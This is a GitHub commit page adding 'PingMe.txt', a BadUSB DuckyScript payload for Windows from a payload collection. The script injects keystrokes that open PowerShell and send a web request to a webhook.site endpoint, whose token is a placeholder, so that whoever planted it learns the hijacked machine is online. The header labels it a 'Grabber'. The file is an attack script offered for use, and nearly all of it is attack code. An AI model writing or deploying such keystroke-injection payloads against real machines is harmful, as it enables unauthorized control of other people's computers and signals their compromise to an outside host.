Merge pull request #159 from 7h30th3r0n3/patch-5

Create PingMe.txt
This commit is contained in:
UberGuidoZ 2022-09-26 13:15:11 -07:00 committed by GitHub
commit 59ef91c1b3
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

13
BadUSB/PingMe.txt Normal file
View File

@ -0,0 +1,13 @@
REM Title: PingMe
REM Author: 7h30th3r0n3
REM Target: Windows 7/8/10/11
REM Version: 1
REM Category: Grabber
REM Designed to be used for mouse hijacking to find out if it is connected to the internet
GUI r
DELAY 400
STRING powershell
ENTER
DELAY 400
STRING Invoke-WebRequest -Uri https://webhook.site/<TOKEN> -Method GET;exit
ENTER